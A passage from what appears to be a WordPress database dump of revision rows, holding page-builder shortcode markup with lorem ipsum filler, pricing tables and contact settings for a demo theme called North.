source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row parallax=\"yes\" color_scheme=\"white\" bg_overlay=\"dark\" content_width=\"fullwidth\" css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" darken=\"dark\" fullwidth=\"yes\"][vc_column][special_heading title=\"Our Featured Works\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\" color=\"dark\"][portfolio_carousel cats=\"branding,design,photography,video\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_subtitle=\"click for our all works\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_subtitle=\"send us a message\" button2_url=\"#contact\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column][special_heading title=\"Our Skills\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"services\" bg_overlay=\"light\" css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"OUR SERVICES\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\" color=\"dark\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"prices\" color_scheme=\"white\" bg_overlay=\"darker\" css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\"][vc_column][special_heading title=\"Our Pricing Tables\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" featured=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_overlay=\"light\" css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"Keep in Touch\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" color=\"dark\"][vntd_contact_form id=\"417\" email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"contact\" bg_overlay=\"darker\" css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\"][vc_column][contact_block address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column][gmap marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\"][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2020-10-28 15:32:56','2020-10-28 15:32:56','',623,'http://highperformingstudent.com/2020/10/28/623-revision-v1/',0,'revision','',0),(1917,1,'2014-06-23 09:20:53','2014-06-23 09:20:53','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][rev_slider_vc alias=\"north_home\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"4\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"yes\" posts_nr=\"9\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409759211052{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" 